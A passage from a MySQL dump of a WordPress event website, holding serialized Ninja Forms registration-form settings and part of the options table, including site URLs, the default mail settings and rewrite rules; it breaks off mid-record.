16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_2\";}s:2:\"id\";i:15;}i:8;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"12\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:3:\"key\";s:4:\"html\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:480:\"<p>Below, you can find a map of the event venue.<br>\nPlease contact us for any further details</p>\n\n\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3105.150199370797!2d-77.03871848503316!3d38.897680454533216!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7b7bcdecbb1df%3A0x715969d86d0b76bf!2sThe+White+House!5e0!3m2!1sen!2sus!4v1472415172562\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen=\"\" title=\"Event Location\"></iframe>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:4:\"html\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:16;}i:9;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"13\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:8:\"Register\";s:3:\"key\";s:8:\"register\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:8:\"Register\";s:9:\"field_key\";s:8:\"register\";}s:2:\"id\";i:17;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:47:\"<p>Thank you for registering for our event.</p>\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";}s:2:\"id\";i:8;}i:1;a:2:{s:8:\"settings\";a:25:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:23:\"User Email Confirmation\";s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:39:\"Thank you for registering for our event\";s:13:\"email_message\";s:72:\"<p>Your registration details are below:</p><p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:6;}i:2;a:2:{s:8:\"settings\";a:25:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:24:\"Admin Email Notification\";s:2:\"to\";s:20:\"{system:admin_email}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:62:\"New Event Registration from {field:firstname} {field:lastname}\";s:13:\"email_message\";s:67:\"<p>Registration details are below:</p><p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:7;}i:3;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:17:\"Record Submission\";s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:5;}}s:8:\"settings\";a:23:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:18:\"Event Registration\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:10:\"form_title\";s:18:\"Event Registration\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"1\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:77:\"icfsrm_2022_conference_is_climate_change_challenges_and_threats_1668262317133\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:7:\"textbox\";i:6;s:4:\"hr_1\";i:7;s:4:\"hr_2\";i:8;s:4:\"html\";i:9;s:8:\"register\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,'\0');
/*!40000 ALTER TABLE `dnctiavkr_nf3_upgrades` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_options`
--

DROP TABLE IF EXISTS `dnctiavkr_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=434123 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_options`
--

LOCK TABLES `dnctiavkr_options` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_options` DISABLE KEYS */;
INSERT INTO `dnctiavkr_options` VALUES
(1,'siteurl','https://gsw2023.com','yes'),
(2,'home','https://gsw2023.com','yes'),
(3,'blogname','GSW2023','yes'),
(4,'blogdescription','Egypt GSW2023','yes'),
(5,'users_can_register','0','yes'),
(6,'admin_email','ay.zaghweb@gmail.com','yes'),
(7,'start_of_week','1','yes'),
(8,'use_balanceTags','0','yes'),
(9,'use_smilies','1','yes'),
(10,'require_name_email','1','yes'),
(11,'comments_notify','1','yes'),
(12,'posts_per_rss','10','yes'),
(13,'rss_use_excerpt','0','yes'),
(14,'mailserver_url','mail.example.com','yes'),
(15,'mailserver_login','login@example.com','yes'),
(16,'mailserver_pass','password','yes'),
(17,'mailserver_port','110','yes'),
(18,'default_category','1','yes'),
(19,'default_comment_status','open','yes'),
(20,'default_ping_status','open','yes'),
(21,'default_pingback_flag','1','yes'),
(22,'posts_per_page','10','yes'),
(23,'date_format','F j, Y','yes'),
(24,'time_format','g:i a','yes'),
(25,'links_updated_date_format','F j, Y g:i a','yes'),
(26,'comment_moderation','0','yes'),
(27,'moderation_notify','1','yes'),
(28,'permalink_structure','/index.php/%year%/%monthnum%/%day%/%postname%/','yes'),
(29,'rewrite_rules','a:254:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:20:\"index.php/project/?$\";s:32:\"index.php?post_type=dt_portfolio\";s:50:\"index.php/project/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?post_type=dt_portfolio&feed=$matches[1]\";s:45:\"index.php/project/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?post_type=dt_portfolio&feed=$matches[1]\";s:37:\"index.php/project/page/([0-9]{1,})/?$\";s:50:\"index.php?post_type=dt_portfolio&paged=$matches[1]\";s:20:\"index.php/dt_team/?$\";s:27:\"index.php?post_type=dt_team\";s:50:\"index.php/dt_team/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=dt_team&feed=$matches[1]\";s:45:\"index.php/dt_team/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=dt_team&feed=$matches[1]\";s:37:\"index.php/dt_team/page/([0-9]{1,})/?$\";s:45:\"index.php?post_type=dt_team&paged=$matches[1]\";s:28:\"index.php/dt_testimonials/?$\";s:35:\"index.php?post_type=dt_testimonials\";s:58:\"index.php/dt_testimonials/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?post_type=dt_testimonials&feed=$matches[1]\";s:53:\"index.php/dt_testimonials/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?post_type=dt_testimonials&feed=$matches[1]\";s:45:\"index.php/dt_testimonials/page/([0-9]{1,})/?$\";s:53:\"index.php?post_type=dt_testimonials&paged=$matches[1]\";s:25:\"index.php/dt_slideshow/?$\";s:32:\"index.php?post_type=dt_slideshow\";s:55:\"index.php/dt_slideshow/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?post_type=dt_slideshow&feed=$matches[1]\";s:50:\"index.php/dt_slideshow/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?post_type=dt_slideshow&feed=$matches[1]\";s:42:\"index.php/dt_slideshow/page/([0-9]{1,})/?$\";s:50:\"index.php?post_type=dt_slideshow&paged=$matches[1]\";s:23:\"index.php/dt_gallery/?$\";s:30:\"index.php?post_type=dt_gallery\";s:53:\"index.php/dt_gallery/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?post_type=dt_gallery&feed=$matches[1]\";s:48:\"index.php/dt_gallery/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?post_type=dt_gallery&feed=$matches[1]\";s:40:\"index.php/dt_gallery/page/([0-9]{1,})/?$\";s:48:\"index.php?post_type=dt_gallery&paged=$matches[1]\";s:57:\"index.php/category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:52:\"index.php/category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:33:\"index.php/category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:45:\"index.php/category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:27:\"index.php/category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:54:\"index.php/tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:49:\"index.php/tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:30:\"index.php/tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:42:\"index.php/tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:24:\"index.php/tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:55:\"index.php/type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:50:\"index.php/type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:31:\"index.php/type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:43:\"index.php/type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:25:\"index.php/type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:67:\"index.php/workshops-category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?dt_portfolio_category=$matches[1]&feed=$matches[2]\";s:62:\"index.php/workshops-category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?dt_portfolio_category=$matches[1]&feed=$matches[2]\";s:43:\"index.php/workshops-category/(.+?)/embed/?$\";s:54:\"index.php?dt_portfolio_category=$matches[1]&embed=true\";s:55:\"index.php/workshops-category/(.+?)/page/?([0-9]{1,})/?$\";s:61:\"index.php?dt_portfolio_category=$matches[1]&paged=$matches[2]\";s:37:\"index.php/workshops-category/(.+?)/?$\";s:43:\"index.php?dt_portfolio_category=$matches[1]\";s:64:\"index.php/workshops-tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:56:\"index.php?dt_portfolio_tags=$matches[1]&feed=$matches[2]\";s:59:\"index.php/workshops-tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:56:\"index.php?dt_portfolio_tags=$matches[1]&feed=$matches[2]\";s:40:\"index.php/workshops-tag/([^/]+)/embed/?$\";s:50:\"index.php?dt_portfolio_tags=$matches[1]&embed=true\";s:52:\"index.php/workshops-tag/([^/]+)/page/?([0-9]{1,})/?$\";s:57:\"index.php?dt_portfolio_tags=$matches[1]&paged=$matches[2]\";s:34:\"index.php/workshops-tag/([^/]+)/?$\";s:39:\"index.php?dt_portfolio_tags=$matches[1]\";s:73:\"index.php/dt_testimonials_category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:63:\"index.php?dt_testimonials_category=$matches[1]&feed=$matches[2]\";s:68:\"index.php/dt_testimonials_category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:63:\"index.php?dt_testimonials_category=$matches[1]&feed=$matches[2]\";s:49:\"index.php/dt_testimonials_category/(.+?)/embed/?$\";s:57:\"index.php?dt_testimonials_category=$matches[1]&embed=true\";s:61:\"index.php/dt_testimonials_category/(.+?)/page/?([0-9]{1,})/?$\";s:64:\"index.php?dt_testimonials_category=$matches[1]&paged=$matches[2]\";s:43:\"index.php/dt_testimonials_category/(.+?)/?$\";s:46:\"index.php?dt_testimonials_category=$matches[1]\";s:65:\"index.php/dt_team_category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?dt_team_category=$matches[1]&feed=$matches[2]\";s:60:\"index.php/dt_team_category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?dt_team_category=$matches[1]&feed=$matches[2]\";s:41:\"index.php/dt_team_category/(.+?)/embed/?$\";s:49:\"index.php?dt_team_category=$matches[1]&embed=true\";s:53:\"index.php/dt_team_category/(.+?)/page/?([0-9]{1,})/?$\";s:56:\"index.php?dt_team_category=$matches[1]&paged=$matches[2]\";s:35:\"index.php/dt_team_category/(.+?)/?$\";s:38:\"index.php?dt_team_category=$matches[1]\";s:68:\"index.php/dt_gallery_category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:58:\"index.php?dt_gallery_category=$matches[1]&feed=$matches[2]\";s:63:\"index.php/dt_gallery_category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:58:\"index.php?dt_gallery_category=$matches[1]&feed=$matches[2]\";s:44:\"index.php/dt_gallery_category/(.+?)/embed/?$\";s:52:\"index.php?dt_gallery_category=$matches[1]&embed=true\";s:56:\"index.php/dt_gallery_category/(.+?)/page/?([0-9]{1,})/?$\";s:59:\"index.php?dt_gallery_category=$matches[1]&paged=$matches[2]\";s:38:\"index.php/dt_gallery_category/(.+?)/?$\";s:41:\"index.php?dt_gallery_category=$matches[1]\";s:45:\"index.php/project/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:55:\"index.php/project/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:75:\"index.php/project/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:70:\"index.php/project/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:70:\"index.php/project/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:51:\"index.php/project/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:34:\"index.php/project/([^/]+)/embed/?$\";s:45:\"index.php?dt_portfolio=$matches[1]&embed=true\";s:38:\"index.php/project/([^/]+)/trackback/?$\";s:39:\"index.php?dt_portfolio=$matches[1]&tb=1\";s:58:\"index.php/project/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?dt_portfolio=$matches[1]&feed=$matches[2]\";s:53:\"index.php/project/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?dt_portfolio=$matches[1]&feed=$matches[2]\";s:46:\"index.php/project/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?dt_portfolio=$matches[1]&paged=$matches[2]\";s:53:\"index.php/project/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?dt_portfolio=$matches[1]&cpage=$matches[2]\";s:42:\"index.php/project/([^/]+)(?:/([0-9]+))?/?$\";s:51:\"index.php?dt_portfolio=$matches[1]&page=$matches[2]\";s:34:\"index.php/project/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:44:\"index.php/project/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:64:\"index.php/project/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"index.php/project/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"index.php/project/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:40:\"index.php/project/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:45:\"index.php/dt_team/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:55:\"index.php/dt_team/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:75:\"index.php/dt_team/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:70:\"index.php/dt_team/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:70:\"index.php/dt_team/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:51:\"index.php/dt_team/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:34:\"index.php/dt_team/([^/]+)/embed/?$\";s:40:\"index.php?dt_team=$matches[1]&embed=true\";s:38:\"index.php/dt_team/([^/]+)/trackback/?$\";s:34:\"index.php?dt_team=$matches[1]&tb=1\";s:58:\"index.php/dt_team/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?dt_team=$matches[1]&feed=$matches[2]\";s:53:\"index.php/dt_team/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?dt_team=$matches[1]&feed=$matches[2]\";s:46:\"index.php/dt_team/([^/]+)/page/?([0-9]{1,})/?$\";s:47:\"index.php?dt_team=$matches[1]&paged=$matches[2]\";s:53:\"index.php/dt_team/([^/]+)/comment-page-([0-9]{1,})/?$\";s:47:\"index.php?dt_team=$matches[1]&cpage=$matches[2]\";s:42:\"index.php/dt_team/([^/]+)(?:/([0-9]+))?/?$\";s:46:\"index.php?dt_team=$matches[1]&page=$matches[2]\";s:34:\"index.php/dt_team/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:44:\"index.php/dt_team/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:64:\"index.php/dt_team/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"index.php/dt_team/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"index.php/dt_team/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:40:\"index.php/dt_team/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"index.php/dt_testimonials/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:63:\"index.php/dt_testimonials/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:83:\"index.php/dt_testimonials/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:78:\"index.php/dt_testimonials/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:78:\"index.php/dt_testimonials/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:59:\"index.php/dt_testimonials/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:42:\"index.php/dt_testimonials/([^/]+)/embed/?$\";s:48:\"index.php?dt_testimonials=$matches[1]&embed=true\";s:46:\"index.php/dt_testimonials/([^/]+)/trackback/?$\";s:42:\"index.php?dt_testimonials=$matches[1]&tb=1\";s:66:\"index.php/dt_testimonials/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:54:\"index.php?dt_testimonials=$matches[1]&feed=$matches[2]\";s:61:\"index.php/dt_testimonials/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:54:\"index.php?dt_testimonials=$matches[1]&feed=$matches[2]\";s:54:\"index.php/dt_testimonials/([^/]+)/page/?([0-9]{1,})/?$\";s:55:\"index.php?dt_testimonials=$matches[1]&paged=$matches[2]\";s:61:\"index.php/dt_testimonials/([^/]+)/comment-page-([0-9]{1,})/?$\";s:55:\"index.php?dt_testimonials=$matches[1]&cpage=$matches[2]\";s:50:\"index.php/dt_testimonials/([^/]+)(?:/([0-9]+))?/?$\";s:54:\"index.php?dt_testimonials=$matches[1]&page=$matches[2]\";s:42:\"index.php/dt_testimonials/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:52:\"index.php/dt_testimonials/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:72:\"index.php/dt_testimonials/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"index.php/dt_testimonials/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"index.php/dt_testimonials/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\"index.php/dt_testimonials/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:50:\"index.php/dt_slideshow/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:60:\"index.php/dt_slideshow/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:80:\"index.php/dt_slideshow/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:75:\"index.php/dt_slideshow/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:75:\"index.php/dt_slideshow/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:56:\"index.php/dt_slideshow/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:39:\"index.php/dt_slideshow/([^/]+)/embed/?$\";s:45:\"index.php?dt_slideshow=$matches[1]&embed=true\";s:43:\"index.php/dt_slideshow/([^/]+)/trackback/?$\";s:39:\"index.php?dt_slideshow=$matches[1]&tb=1\";s:63:\"index.php/dt_slideshow/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\